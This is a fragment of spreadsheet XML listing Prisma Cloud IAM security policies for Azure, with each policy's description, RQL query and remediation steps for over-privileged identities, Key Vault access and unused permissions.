      <c r="X3085"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Management group, Subscription Scope or Resource group level
6. Narrow down the scop level</t>
        </is>
      </c>
      <c r="Y3085" t="inlineStr"/>
      <c r="Z3085" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' and dest.cloud.resource.name = '*'</t>
        </is>
      </c>
      <c r="AA3085" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3085" t="inlineStr">
        <is>
          <t>2023-09-15 07:13:11</t>
        </is>
      </c>
      <c r="AC3085" t="inlineStr"/>
      <c r="AD3085" t="b">
        <v>1</v>
      </c>
      <c r="AE3085" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3085" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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5" t="inlineStr">
        <is>
          <t>969f13d2-c84a-4c81-bbbb-7640bb83feaf</t>
        </is>
      </c>
      <c r="AI3085" t="inlineStr">
        <is>
          <t>969f13d2-c84a-4c81-bbbb-7640bb83feaf</t>
        </is>
      </c>
      <c r="AJ3085" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3085" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3086">
      <c r="A3086" t="inlineStr"/>
      <c r="B3086" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3086" s="2" t="inlineStr"/>
      <c r="D3086" t="inlineStr"/>
      <c r="E3086" t="inlineStr"/>
      <c r="F3086" t="inlineStr"/>
      <c r="G3086" t="b">
        <v>1</v>
      </c>
      <c r="H30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086" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3086" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3086" t="inlineStr">
        <is>
          <t>Azure Function App with administrative permissions</t>
        </is>
      </c>
      <c r="L3086" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3086" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3086" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3086" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3086" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3086" t="inlineStr"/>
      <c r="R3086" t="inlineStr"/>
      <c r="S3086" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3086" t="b">
        <v>1</v>
      </c>
      <c r="U3086" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3086" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3086" t="inlineStr">
        <is>
          <t>Identifies Function App instances granted administrative permissions, increasing the blast radius in case of a potential comrpomise of the function.</t>
        </is>
      </c>
      <c r="X3086" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Asset Name", the "View JSON{}"
2. Scroll down to the "data" field, and under "identity" make note of the managed identity type and principalId listed
3. Still in the Prisma Cloud Console, select 'Investigate'
4. Paste the following query into the investigation prompt, replacing the placeholder with the id of the managed identity you obtained in the previous steps: config from iam where dest.cloud.type = 'AWS' AND grantedby.cloud.entity.id ='&lt;principalId&gt;'
5. In the results, under "Granted By Policy", you will see the roles attached to the managed identity
Once examining the roles and determining which permissions are unnecessary and can be removed based on the Function App's intended use, sign in to your Azure tenant. In order to remove any unnecessary permissions , use the following remediation steps:
Navigate to the Entra ID service, and search for the id retrieved earlier. Remove the relevant role for a less privileged one sufficient for the Function App's intended purpose</t>
        </is>
      </c>
      <c r="Y308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86" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' AND action.access.isAdministrative = true and source.cloud.service.name = 'microsoft.web'</t>
        </is>
      </c>
      <c r="AA3086" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3086" t="inlineStr">
        <is>
          <t>2024-09-27 06:57:40</t>
        </is>
      </c>
      <c r="AC3086" t="inlineStr"/>
      <c r="AD3086" t="b">
        <v>1</v>
      </c>
      <c r="AE3086" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3086" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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086" t="inlineStr">
        <is>
          <t>ac30988f-dd17-42d7-9853-c744e6cec342</t>
        </is>
      </c>
      <c r="AI3086" t="inlineStr">
        <is>
          <t>ac30988f-dd17-42d7-9853-c744e6cec342</t>
        </is>
      </c>
      <c r="AJ3086" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3086" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3087">
      <c r="A3087" t="inlineStr"/>
      <c r="B3087" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3087" s="2" t="inlineStr"/>
      <c r="D3087" t="inlineStr"/>
      <c r="E3087" t="inlineStr"/>
      <c r="F3087" t="inlineStr"/>
      <c r="G3087" t="b">
        <v>1</v>
      </c>
      <c r="H30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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3087" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3087" t="inlineStr">
        <is>
          <t>Azure Managed Identity (user assigned or system assigned) with broad Key Vault access through Built-in Azure roles</t>
        </is>
      </c>
      <c r="L3087" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3087" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3087" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3087" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3087" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3087" t="inlineStr"/>
      <c r="R3087" t="inlineStr"/>
      <c r="S3087" t="inlineStr"/>
      <c r="T3087" t="b">
        <v>0</v>
      </c>
      <c r="U3087" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3087" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3087" t="inlineStr">
        <is>
          <t>Managed identities provide an automatic way for applications to connect to resources that support Azure Active Directory (Azure AD) authentication. Providing Key Vault access lets non-human identities query key vaults for credential and secret data</t>
        </is>
      </c>
      <c r="X3087"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and the role with permissions to Microsoft KeyVault
    6. Remove the assignment
    7. Create a new assignment with built-in or custom role without risky permissions and/or scoped down to only the Key Vaults that this identity requires access to, if necessary</t>
        </is>
      </c>
      <c r="Y3087" t="inlineStr"/>
      <c r="Z3087" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type IN ( 'System Assigned', 'User Assigned' ) AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name IN( 'Key Vault Administrator','Key Vault Certificates Officer','Key Vault Crypto Officer','Key Vault Crypto Service Encryption User','Key Vault Crypto User','Key Vault Reader','Key Vault Secrets Officer','Key Vault Secrets User' )AND dest.cloud.service.name = 'Microsoft.KeyVault' AND dest.cloud.resource.name = '*'</t>
        </is>
      </c>
      <c r="AA3087" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3087" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3087" t="inlineStr"/>
      <c r="AD3087" t="b">
        <v>1</v>
      </c>
      <c r="AE3087" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3087" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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7" t="inlineStr">
        <is>
          <t>1aae9027-91c0-4696-a08d-cb6d7e390cce</t>
        </is>
      </c>
      <c r="AI3087" t="inlineStr">
        <is>
          <t>1aae9027-91c0-4696-a08d-cb6d7e390cce</t>
        </is>
      </c>
      <c r="AJ3087" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3087" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3088">
      <c r="A3088" t="inlineStr"/>
      <c r="B3088" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3088" s="2" t="inlineStr"/>
      <c r="D3088" t="inlineStr"/>
      <c r="E3088" t="inlineStr"/>
      <c r="F3088" t="inlineStr"/>
      <c r="G3088" t="b">
        <v>1</v>
      </c>
      <c r="H30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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3088" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3088" t="inlineStr">
        <is>
          <t>Azure Service Principals with broad Key Vault access through Built-in Azure roles</t>
        </is>
      </c>
      <c r="L3088" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3088" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3088" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3088" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3088" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3088" t="inlineStr"/>
      <c r="R3088" t="inlineStr"/>
      <c r="S3088" t="inlineStr"/>
      <c r="T3088" t="b">
        <v>0</v>
      </c>
      <c r="U3088" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3088" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3088" t="inlineStr">
        <is>
          <t>Service Principles provide an automatic way for applications to connect to resources that support Azure Active Directory (Azure AD) authentication. Providing Key Vault access lets non-human identities query key vaults for credential and secret data</t>
        </is>
      </c>
      <c r="X3088"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and the role with permissions to Microsoft KeyVault
    6. Remove the assignment
    7. Create a new assignment with built-in or custom role without risky permissions and/or scoped down to only the Key Vaults that this identity requires access to, if necessary</t>
        </is>
      </c>
      <c r="Y3088" t="inlineStr"/>
      <c r="Z3088" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type = 'Service Principal' AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name IN( 'Key Vault Administrator','Key Vault Certificates Officer','Key Vault Crypto Officer','Key Vault Crypto Service Encryption User','Key Vault Crypto User','Key Vault Reader','Key Vault Secrets Officer','Key Vault Secrets User' )AND dest.cloud.service.name = 'Microsoft.KeyVault' AND dest.cloud.resource.name = '*'</t>
        </is>
      </c>
      <c r="AA3088" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3088" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3088" t="inlineStr"/>
      <c r="AD3088" t="b">
        <v>1</v>
      </c>
      <c r="AE3088" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3088" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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8" t="inlineStr">
        <is>
          <t>4eb8a151-91d2-4960-b645-6e953d0a79d7</t>
        </is>
      </c>
      <c r="AI3088" t="inlineStr">
        <is>
          <t>4eb8a151-91d2-4960-b645-6e953d0a79d7</t>
        </is>
      </c>
      <c r="AJ3088" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3088" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3089">
      <c r="A3089" t="inlineStr"/>
      <c r="B3089" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3089" s="2" t="inlineStr"/>
      <c r="D3089" t="inlineStr"/>
      <c r="E3089" t="inlineStr"/>
      <c r="F3089" t="inlineStr"/>
      <c r="G3089" t="b">
        <v>1</v>
      </c>
      <c r="H30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89" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3089" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3089" t="inlineStr">
        <is>
          <t>Azure AD users with broad Key Vault management access</t>
        </is>
      </c>
      <c r="L3089" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3089" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3089" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3089" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3089" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3089" t="inlineStr"/>
      <c r="R3089" t="inlineStr"/>
      <c r="S3089" t="inlineStr"/>
      <c r="T3089" t="b">
        <v>0</v>
      </c>
      <c r="U3089" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3089" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3089" t="inlineStr">
        <is>
          <t>Providing Key Vault access lets users manage key vaults. The least privilege model should be enforced and unused sensitive permissions should be revoked</t>
        </is>
      </c>
      <c r="X3089"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user and the role with permissions to Microsoft KeyVault
    6. Remove the assignment
    7. Create a new assignment with built-in or custom role without risky permissions and/or scoped down to only the Key Vaults that this identitiy requires access to, if necessary</t>
        </is>
      </c>
      <c r="Y3089" t="inlineStr"/>
      <c r="Z3089" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND source.cloud.resource.type = 'user' AND dest.cloud.service.name = 'Microsoft.KeyVault' AND dest.cloud.resource.name = '*' AND action.name DOES NOT END WITH 'read'</t>
        </is>
      </c>
      <c r="AA3089" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3089" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3089" t="inlineStr"/>
      <c r="AD3089" t="b">
        <v>1</v>
      </c>
      <c r="AE3089" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3089" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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89" t="inlineStr">
        <is>
          <t>882e73b6-6544-40ae-9993-bb2bfa3ec1d9</t>
        </is>
      </c>
      <c r="AI3089" t="inlineStr">
        <is>
          <t>882e73b6-6544-40ae-9993-bb2bfa3ec1d9</t>
        </is>
      </c>
      <c r="AJ3089" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3089" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3090">
      <c r="A3090" t="inlineStr"/>
      <c r="B3090" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3090" s="2" t="inlineStr"/>
      <c r="D3090" t="inlineStr"/>
      <c r="E3090" t="inlineStr"/>
      <c r="F3090" t="inlineStr"/>
      <c r="G3090" t="b">
        <v>1</v>
      </c>
      <c r="H30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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3090" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3090" t="inlineStr">
        <is>
          <t>Azure VM instance associated managed identities with Key Vault management access (data access is not included)</t>
        </is>
      </c>
      <c r="L3090" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3090" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3090" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3090" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3090" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3090" t="inlineStr"/>
      <c r="R3090" t="inlineStr"/>
      <c r="S3090" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3090" t="b">
        <v>1</v>
      </c>
      <c r="U3090" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3090" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3090" t="inlineStr">
        <is>
          <t>With access to 'Microsoft.KeyVault' service, an adversary can elevate the access of the VM instance, expanding the surface of the attack and granting access to cloud resources with sensitive information.</t>
        </is>
      </c>
      <c r="X3090" t="inlineStr">
        <is>
          <t>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permissions to Microsoft KeyVault
    8. Remove the assignment
    9. Create a new assignment with a built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y309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0" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type IN ( 'System Assigned', 'User Assigned' ) AND dest.cloud.service.name = 'Microsoft.KeyVault' AND source.cloud.service.name = 'Microsoft.Compute' AND action.name DOES NOT END WITH 'read'</t>
        </is>
      </c>
      <c r="AA3090" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3090" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3090" t="inlineStr"/>
      <c r="AD3090" t="b">
        <v>1</v>
      </c>
      <c r="AE3090" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3090" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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0" t="inlineStr">
        <is>
          <t>1ca7610e-d95a-4a3a-abf4-104cdf5c43e8</t>
        </is>
      </c>
      <c r="AI3090" t="inlineStr">
        <is>
          <t>1ca7610e-d95a-4a3a-abf4-104cdf5c43e8</t>
        </is>
      </c>
      <c r="AJ3090" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3090" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3091">
      <c r="A3091" t="inlineStr"/>
      <c r="B3091" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3091" s="2" t="inlineStr"/>
      <c r="D3091" t="n">
        <v>0</v>
      </c>
      <c r="E3091" t="n">
        <v>12</v>
      </c>
      <c r="F3091" t="n">
        <v>0</v>
      </c>
      <c r="G3091" t="b">
        <v>1</v>
      </c>
      <c r="H30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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3091" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3091" t="inlineStr">
        <is>
          <t>Azure IAM effective permissions are over-privileged (90 days)</t>
        </is>
      </c>
      <c r="L3091" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3091" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3091" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3091" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3091" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3091" t="inlineStr"/>
      <c r="R3091" t="inlineStr"/>
      <c r="S3091" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3091" t="b">
        <v>1</v>
      </c>
      <c r="U3091" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3091" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3091" t="inlineStr">
        <is>
          <t>This policy identifies Azure IAM permissions that are over-privileged. As a security best practice, it is recommended to grant the least privilege access like granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3091"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over-privileged permissions
6. Remove the assignment
7. Create a new assignment with built-in or custom role without risky permissions, if necessary</t>
        </is>
      </c>
      <c r="Y309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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3091" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3091" t="inlineStr">
        <is>
          <t>2022-12-09 04:15:06</t>
        </is>
      </c>
      <c r="AC3091" t="inlineStr"/>
      <c r="AD3091" t="b">
        <v>1</v>
      </c>
      <c r="AE3091" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3091" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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1" t="inlineStr">
        <is>
          <t>1de8a24e-7a34-47b6-8de0-bcdfe97f1547</t>
        </is>
      </c>
      <c r="AI3091" t="inlineStr">
        <is>
          <t>1de8a24e-7a34-47b6-8de0-bcdfe97f1547</t>
        </is>
      </c>
      <c r="AJ3091" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3091" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3092">
      <c r="A3092" t="inlineStr"/>
      <c r="B3092" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3092" s="2" t="inlineStr"/>
      <c r="D3092" t="inlineStr"/>
      <c r="E3092" t="inlineStr"/>
      <c r="F3092" t="inlineStr"/>
      <c r="G3092" t="b">
        <v>1</v>
      </c>
      <c r="H30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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3092" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3092" t="inlineStr">
        <is>
          <t>Azure Users and Machine Identities with IAM Metadata Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3092" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3092" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3092" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3092" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3092" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3092" t="inlineStr"/>
      <c r="R3092" t="inlineStr"/>
      <c r="S3092" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3092" t="b">
        <v>1</v>
      </c>
      <c r="U3092" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3092" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3092" t="inlineStr">
        <is>
          <t>This policy identifies Unused Azure AD Identities with Metadata Read Permissions.
Even seemingly harmless permissions like "Metadata Read" in Azure Active Directory (AAD) can be risky if left unused for 90 days. Here's why:
Information Gathering: An attacker might use these credentials to gather information about your Azure environment. This information could include details about virtual machines, storage accounts, or other resources. Attackers could use this information to identify vulnerabilities or plan further attacks.
Lateral Movement: If attackers compromise an Azure AD identity with Metadata Read, they could potentially use it to discover other resources within your Azure infrastructure. This could help them move laterally within your environment and gain access to more sensitive data or systems.
While Metadata Read itself doesn't allow direct data manipulation, the information gleaned can be valuable for attackers. Here's how to mitigate the risk:
Review and Removal: Regularly identify and disable unused Azure AD identities with any level of Metadata access (Read or Write).
Principle of Least Privilege: Grant only the minimum permissions required for a user or machine identity to function. Metadata Read might not always be necessary.
Monitor Activity: Utilize Azure Monitor to track activity logs, including access attempts for Azure AD identities. This can help detect suspicious behavior related to unused accounts.</t>
        </is>
      </c>
      <c r="X3092"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09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2" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and action.access.level = 'Metadata Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3092" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3092" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3092" t="inlineStr"/>
      <c r="AD3092" t="b">
        <v>1</v>
      </c>
      <c r="AE3092" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3092" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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2" t="inlineStr">
        <is>
          <t>21d3f297-3ea4-4938-9cd9-1d974f7132dd</t>
        </is>
      </c>
      <c r="AI3092" t="inlineStr">
        <is>
          <t>21d3f297-3ea4-4938-9cd9-1d974f7132dd</t>
        </is>
      </c>
      <c r="AJ3092" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3092" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3093">
      <c r="A3093" t="inlineStr"/>
      <c r="B3093" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3093" s="2" t="inlineStr"/>
      <c r="D3093" t="inlineStr"/>
      <c r="E3093" t="inlineStr"/>
      <c r="F3093" t="inlineStr"/>
      <c r="G3093" t="b">
        <v>1</v>
      </c>
      <c r="H30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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3093" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3093" t="inlineStr">
        <is>
          <t>Azure Users and Machine Identities with Administrative Permissions</t>
        </is>
      </c>
      <c r="L3093" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3093" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3093" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3093" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3093" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3093" t="inlineStr"/>
      <c r="R3093" t="inlineStr"/>
      <c r="S3093" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3093" t="b">
        <v>1</v>
      </c>
      <c r="U3093" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3093" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3093" t="inlineStr">
        <is>
          <t>This policy identifies Azure AD Users and Managed Identities with Azure RBAC Administrative Permissions.
Risk of Administrative Permissions:
Azure AD users and managed identities with active Azure RBAC administrative permissions (elevated permissions) pose a significant security risk because:
Unrestricted Access: These identities hold the "keys to the kingdom" within your Azure environment. If compromised, attackers can leverage them to perform any action, including creating, modifying, or deleting critical resources. This could lead to data breaches, service disruptions, or significant financial losses.
Privilege Escalation Potential: Some administrative permissions allow for elevating privileges of other identities. This opens the door for attackers to gain access to even more sensitive resources and systems within your Azure environment.
Mitigating the Risk:
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning Azure RBAC permissions. Avoid creating users or managed identities with administrative permissions unless absolutely necessary. Grant only the minimum set of permissions required for each to fulfill their specific tasks.
Multi-Factor Authentication (MFA): Enforce MFA for all Azure AD users with administrative permissions. MFA adds an extra layer of security and makes it significantly harder for attackers to compromise an account, even if they obtain the credentials.
Just-In-Time (JIT) Access: Consider implementing Azure AD Privileged Access Management (PAM) to enable Just-In-Time (JIT) access for administrative tasks. This approach grants temporary, role-based access for specific periods, minimizing the window of opportunity for attackers if a credential is compromised.
Managed Identity Access Restrictions: For managed identities, utilize Azure Resource Manager (ARM) templates or Azure policies to restrict access to specific resource groups, subscriptions, or resources. This helps limit the potential damage if a managed identity is compromised.
Regular Review and Auditing: Regularly review Azure AD user and managed identity access assignments, especially those with administrative permissions. Conduct periodic security audits to identify potential weaknesses in your Azure RBAC configuration.
Monitor for Suspicious Activity: Utilize Azure Monitor to track activity logs, including actions performed by users and managed identities with administrative permissions. This vigilance can help detect unusual activity related to these entities that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3093"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09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3" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and action.access.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3093" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3093" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3093" t="inlineStr"/>
      <c r="AD3093" t="b">
        <v>1</v>
      </c>
      <c r="AE3093" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3093" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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3" t="inlineStr">
        <is>
          <t>26710788-50b9-4072-bf3e-3acdb48d6df1</t>
        </is>
      </c>
      <c r="AI3093" t="inlineStr">
        <is>
          <t>26710788-50b9-4072-bf3e-3acdb48d6df1</t>
        </is>
      </c>
      <c r="AJ3093" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3093" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3094">
